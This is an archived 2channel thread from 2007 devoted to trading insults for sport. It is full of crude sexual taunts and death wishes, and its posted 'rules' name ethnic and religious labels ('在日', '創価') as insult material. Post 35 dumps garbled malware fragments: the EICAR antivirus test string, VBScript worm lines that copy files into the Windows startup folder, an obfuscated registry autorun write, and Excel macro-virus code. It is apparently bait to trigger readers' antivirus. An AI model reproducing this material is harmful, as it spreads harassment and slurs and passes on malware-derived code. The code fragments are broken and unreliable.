2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

+.(人´Д`*).+゜煽り合って精神を鍛えるスレ135

1 :ドブ顔 ◆MISAWA.cxg :2007/12/13(木) 20:08:16
煽られるとすぐ凹んでしまうあなた m9(・∀・)ニヤニヤ
ここで煽り合って耐性を付けて本番に臨みましょう!
【2ch初心者&元気な名無しさんも大歓迎!】

2 :ドブ顔 ◆MISAWA.cxg :2007/12/13(木) 20:09:03
前スレ
【最強固定】煽り合って精神を鍛えるスレ133【んこ様見参】(実質134)
http://ex21.2ch.net/test/read.cgi/nanmin/1195641236/

3 :名無し草:2007/12/13(木) 20:16:03
かわいい

4 :ワンポイントジャック ◆7Y66q8IjaU :2007/12/13(木) 20:43:59
>>1おつだが

早過ぎじゃね?w

5 :ドブ顔 ◆MISAWA.cxg :2007/12/13(木) 23:14:42
+.(人´Д`*).+゜アフォが間違えたスレ番、きっちり修正してやっただわさ

6 :名無し草:2007/12/13(木) 23:31:19
http://www.pachi777.com/index48.htm

7 :名無し草:2007/12/14(金) 00:12:45
おいクソ顔

スレタイ顔文字自重wwwwwwwwwwwwww

8 :ドブ顔 ◆MISAWA.cxg :2007/12/14(金) 22:46:06
+.(人´Д`*).+゜保守だわさ

9 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 00:36:28
>>1


10 :名無し草:2007/12/15(土) 01:04:58
999 名前:イカりダコ ◆Tako8droQ6 [] 投稿日:2007/12/15(土) 01:03:59
999なら1000は乳首うp

1000 名前:緑茶[] 投稿日:2007/12/15(土) 01:04:08
てへっ 1000は渡しませんよ^^ また次の機会にどうぞ>< 

キタ━(゚∀゚)━!!!!!キタ━(゚∀゚)━!!!!!キタ━(゚∀゚)━!!!!!

11 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 01:05:00
一秒差で緑茶に負けた。

12 :ドブ顔 ◆MISAWA.cxg :2007/12/15(土) 01:05:12
☆☆☆ 煽りの鉄則 ☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆

1)煽るなら投稿されてから、少なくとも20レス以内に反応したいものです。

2)相手の健康状態をネタにするのは品位がありません。逆に反撃されるのがオチです。

3)sageのまま煽るのは勝てない証拠です。age進行でいくことが大切です。

4)あからさまに相手と馴れ合うのは、このスレでは頭悪そうに見えるので止めましょう。

5)「ハゲ」、「デブオタ」、「ニート」、「ヒッキー」、「創価」、「在日」等、
 煽りネタは沢山ありますが、個性を出す為にあなたの一ひねりを加えましょう。
 センスが問われる所です。

6)今日、自分に嫌なことがあったとかムシャクシャしている日は、
 それを思いっきりここでぶつけて下さい。普段は冷静なあなたもここでは爆発可能です。

7)『荒らし』と『煽り』は違います。お間違え無いように!

他にもいろいろとありますが、それぞれの工夫で豊かな煽りライフを満喫してください。

☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆

13 :緑茶:2007/12/15(土) 01:05:15
皆さん、譲っていただいてありがとうございました^^ 優しいですね>< ちょっとキュンとしました^^

14 :イカりダコ ◆Tako8droQ6 :2007/12/15(土) 01:05:49
>>13
はやく晒せよ
                >>11

15 :ドブ顔 ◆MISAWA.cxg :2007/12/15(土) 01:06:10
+.(人`Д´#).+゜死ねや緑茶!いやマジで一回死んでくれよ!?

16 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 01:07:04
さて、千も獲ったし、寝るかな。

17 :緑茶:2007/12/15(土) 01:08:10
さっき見せたじゃないですか^^; あれでいいじゃない><

18 :イカりダコ ◆Tako8droQ6 :2007/12/15(土) 01:10:08
>>17
じゃあまた起きたらうpしてくれ

馴れ合いスレになってるww過疎るわけですね

19 :緑茶:2007/12/15(土) 01:13:35
ドブ顔さんが錯乱していて危険なので、僕も寝ますね^^ 皆さん、おやすみなさい^^ 

20 :真・篤者 ◆udCC9cHvps :2007/12/15(土) 09:38:30
お前ら情けないな・・・

21 :伊藤みとり:2007/12/15(土) 09:47:43
>>20
世界一、情けないぞうさんが来た。

22 :名無し草:2007/12/15(土) 10:11:39
おはよう

23 :名無し草:2007/12/15(土) 11:11:13
ドブ顔の前のコテってなに?

24 :真・篤者 ◆udCC9cHvps :2007/12/15(土) 11:49:48
緑茶はロリコン

25 :名無し草:2007/12/15(土) 12:16:32
篤者はマザコン

26 :名無し草:2007/12/15(土) 13:36:59
>>23
東雲

27 :真・篤者 ◆udCC9cHvps :2007/12/15(土) 13:39:41
>>26
東雲は俺の嫁だ
失礼は許さんぞ!

28 :キンタマリア:2007/12/15(土) 13:46:59
北京ベルリンダブリン勃起!

29 :キンタマリア:2007/12/15(土) 13:49:43
篤者は俺直属の精鋭
命令一つで猿のようにシコる
ガチホモならではの追従だ

30 :キンタマリア:2007/12/15(土) 13:52:16
お前ら、駄話の蓄積でスレッド消費すんなよ
スレの一つ一つが貴重なメモリーなんだからな

31 :キンタマリア:2007/12/15(土) 13:54:34
それだとお前らのやり方は間違っていたということになる
泣くに泣けない結果として悔恨に苛まれて生きていくことになんぞ

32 :真・篤者 ◆udCC9cHvps :2007/12/15(土) 13:55:02
>>29
あ?
ケツ毛処理して待ってろよ

33 :キン玉利あ:2007/12/15(土) 14:02:40
急用ができた
帰る

34 :真・篤者 ◆udCC9cHvps :2007/12/15(土) 14:08:11
さすがチキンw

35 :名無し草:2007/12/15(土) 14:43:17
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub

36 :キンタマリア:2007/12/15(土) 16:00:32
チキンじゃねーよ洞察力皆無見識ゼロの危篤野郎
こっちにゃこっちの都合があるんだてめぇの意のままに行動してられっかってんだよ
てめー事ある毎にケツ毛処理してまってろって言葉使うよな
いいかげん秋風だし少しは工夫しろよチンカス

37 :キンタマリア:2007/12/15(土) 16:08:58
頻度と実績を取り違えるなよ
ネカマと絡むのが功績になるわけじゃねーんだ
寧ろそんな変人相手と構ってると頭脳が退化していくだけだ


38 :キンタマリア:2007/12/15(土) 16:14:09
誰か来ないかな… 誰も来ないよな
みんなデートやら何やらで忙しいもんな
みんな他のおちんちんが欲しいんだもんな

39 :キンタマリア:2007/12/15(土) 16:16:35
後生だから、そんな手を使わんで下され

40 :キンタマリア:2007/12/15(土) 16:22:40
スレタイに顔文字おりこんだのって、煽りスレ史上初めてじゃね?
珍妙な所業をやってのける度胸、、、っつーか向こう見ずなだけだな
俺はこの責任は全部うんこ様にあると思っている
そもそも、スレタイに固定の名前入れた時点でバッシングを受けて然るべきなんだよ
これを遣り過す姿勢な住民もかなりノー天気で馬鹿で笑える
物の道理ってもんがわかってないねどいつもこいつも
やっぱ俺みたいな常識のある人が統御しないとここはまとまらないな

41 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:32:15
>>36-40

独り言?

42 :キンタマリア:2007/12/15(土) 16:35:54
しかし、スレをまとめるのは当然の事ながらスレ主の義務
俺がしゃしゃりでる情況じゃないな
今はスレ主を支援するのが筋

ま、茶カスすら持て余してるドブスに、俺を含めた住民全員を御しきれる道理はないけどな

43 :キンタマリア:2007/12/15(土) 16:36:51
なんだようんこ様
いたんなら様子見してないでとっとと書き込めよ

44 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:39:16
>>43
たまたま開いたら、ぽまいが活躍してたんだが、
なんか声掛けづらくてな。
雰囲気が、街で奇声を発してる人に酷似してたからさ。

45 :キンタマリア:2007/12/15(土) 16:41:50
独り言じゃないんだけどな。相手に向けて言ってるんだけど
各人に認識があるのかわかんねー

因みに
>>36は篤者
>>37はイカタコ
>>39はうんこ様

そいつら宛でレスを投下してる

46 :真・篤者 ◆udCC9cHvps :2007/12/15(土) 16:42:23
キンタマリア(笑)

47 :キンタマリア:2007/12/15(土) 16:43:54
ネット掲示板で雰囲気っつーのはどう形容したらいいんだ?
この場合、俺に近寄り難いオーラが取り巻いてるっつーことか
まぁ、相手を求めてはいたが、誰も反応してくれないのが前提だったしな

48 :キンタマリア:2007/12/15(土) 16:46:23
「もばい」とか「ぽまい」とか、どういう意図があってやってるわけ?
流行らせようとしてんの?
そんな言葉で文明人気取り出来ると思ったら大間違いだぞ

49 :ウードン百姓 ◆ZOBSllODXo :2007/12/15(土) 16:46:27
ワシは長文は読まない主義

50 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:47:25
篤は、キンタマリアのチンポの皮以下の存在だな。

51 :キンタマリア:2007/12/15(土) 16:48:17
篤者もそう思うだろ?
折角俺が活躍してんのに、某死人固定が俺のおいしいとこ持ってこうと策謀してんの。卑怯だよな

52 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:48:24
>>48
流行らないまでも、もばい反応してるじゃない?

53 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:49:37
>>51
煽りスレで同意求めるなよ!

チキンが!!

54 :キンタマリア:2007/12/15(土) 16:49:54
チン皮以下か。
ダウンタウンの『ナインティナインはダウンタウンのチンカス』に通じるものがあるな

55 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:51:24
>>54
馴れ合うな!ティムポ!!

56 :キンタマリア:2007/12/15(土) 16:51:33
は?なにいってんの
篤者は俺のレスの勢いに委縮してるから、
俺が配慮して篤に意見求めてやってんのによ
うんこ様、マジCKY

57 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:52:17
今日は相談がないぉ〜
http://life9.2ch.net/test/read.cgi/jinsei/1182007758/l50

58 :キンタマリア:2007/12/15(土) 16:52:30
老いさらばえたうんこが調子いいことぬかしてんじゃねーよ!!!

59 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:53:34
>>56
CKYlって響きはカッコいいが、
その称号は、ぽまいのものだよ、ふぐりくん。

60 :キンタマリア:2007/12/15(土) 16:54:02
わざわざリンク貼んなくても、毎日確認してるから心配するな

61 :キンタマリア:2007/12/15(土) 16:55:24
ふぐりくんじゃねーし、キンタマリアだし

てめーがつけた名前をぞんざいに扱うな!!!

62 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:56:24
>>60
じゃたまには談しろよ。
ぽまいは、40代パラサイトシングルだから、
将来の不安はかなり多いだろうよ。

63 :キンタマリア:2007/12/15(土) 16:57:12
混じりたいなら普通に介入していいんだぞ潜伏固定共

64 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 16:57:37
>>キンタ
ぽまいの新しいHNを考案したぞ。

65 :真・篤者 ◆udCC9cHvps :2007/12/15(土) 16:58:30
んこ・・・金魚のフン
キンタマリア・・・下水
篤者・・・金塊
でおk?

66 :キンタマリア:2007/12/15(土) 16:58:36
談しろよとかwwwwwwwイミフwwwwwうはww

67 :キンタマリア:2007/12/15(土) 16:59:56
この名前だって十分な罵りだから
今さら下水だなんて言わなくてもいいんだぞ

68 :キンタマリア:2007/12/15(土) 17:01:45
ただの揚げ足取りじゃねーぞ
後半の文が虚偽のでっちあげにすぎなかったろ
取るに足りない部分だと判断した上での揚げ足だからな

69 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 17:01:50
キンタの新HN

ふぐり章江

70 :キンタマリア:2007/12/15(土) 17:02:51
わかんね。なにから捩った名前だ?

71 :キンタマリア:2007/12/15(土) 17:04:50
>>68は見切り発車だった。失礼

72 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 17:06:58
村主(すぐり)章江から

73 :キンタマリア:2007/12/15(土) 17:09:05
篤者は中二病なだけだよ。うんこ様は老害。
でも、うんこ様の名付けた"キンタマリア"を抵抗なくつけれる俺は
センス抜群だって。ばっちゃがいってた。

74 :キンタマリア:2007/12/15(土) 17:10:30
フィギアスケート見るたびにニヤついてキモがられる人の身にもなってみろ
当然、それは却下だな

75 :名無し草:2007/12/15(土) 17:17:01
終わったか

76 :んこ様 ◆LPAC1scTWI :2007/12/15(土) 17:21:05
真央ちゃんって小力に似てね?

77 :名無し草:2007/12/15(土) 17:22:49
んこ様◆LPAC1scTWI 12/15(土) 17:21
真央ちゃんって小力に似てね?

78 :名無し草:2007/12/15(土) 17:24:38
シュールだ

79 :名無し草:2007/12/15(土) 17:33:29
前スレの結果発表

タイトル:【最強固定】煽り合って精神を鍛えるスレ133【んこ様見参】
【糞スレランク:S】
直接的な誹謗中傷:36/1001 (3.60%)
間接的な誹謗中傷:103/1001 (10.29%)
卑猥な表現:80/1001 (7.99%)
差別的表現:25/1001 (2.50%)
無駄な改行:2/1001 (0.20%)
巨大なAAなど:25/1001 (2.50%)
同一文章の反復:10/1001 (1.00%)
by 糞スレチェッカー Ver1.12 http://kabu.tm.land.to/kuso/kuso.cgi?ver=112

Sランクキタ━━━━━━(゜∀゜)━━━━━━!!!!

ついにSランクに到達したぞ
今回は、S3目指していってみようか
じゃあ、>>1-79までまとめてみんな死ね!!!!

80 :藤原基央:2007/12/15(土) 18:24:11
煽りにきたよ〜♪
煽りにきたよ〜♪
君を煽りにきたんだよ♪

81 :名無し草:2007/12/15(土) 22:51:15
毎日は無理だけど、たまに遊びにくることにしたお

新しい名前を安価で決めますね>>83

82 :名無し草:2007/12/15(土) 23:02:48


83 :名無し草:2007/12/15(土) 23:03:20
ガチホモ

84 :おこめ米 ◆6Vcg7Tb1k6 :2007/12/15(土) 23:04:44
>>83
自己紹介乙

85 :名無し草:2007/12/15(土) 23:31:29
>>81

86 :ビシャス(笑) ◆qQ6wK6czCM :2007/12/16(日) 00:40:32
んこ.とかキンタ.とか何ょ…
欝陶しいな…。

成長も何もないんだな。

あ い か わ ら ず で
な に よ り で す わ


87 :ビシャス(笑) ◆qQ6wK6czCM :2007/12/16(日) 00:43:06
まぁ、まったりヤレな糞漬け共ょ

じ ゃ 、さ よ う な ら

88 :伊藤みとり:2007/12/16(日) 01:38:02
皮剥くから一列に並びなさい!

89 :篤者 ◆bAnhBMWt5g :2007/12/16(日) 12:18:14
やあ!

90 :イカりダコ ◆Tako8droQ6 :2007/12/16(日) 15:30:11
サ〜ザエさんサザエさん

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)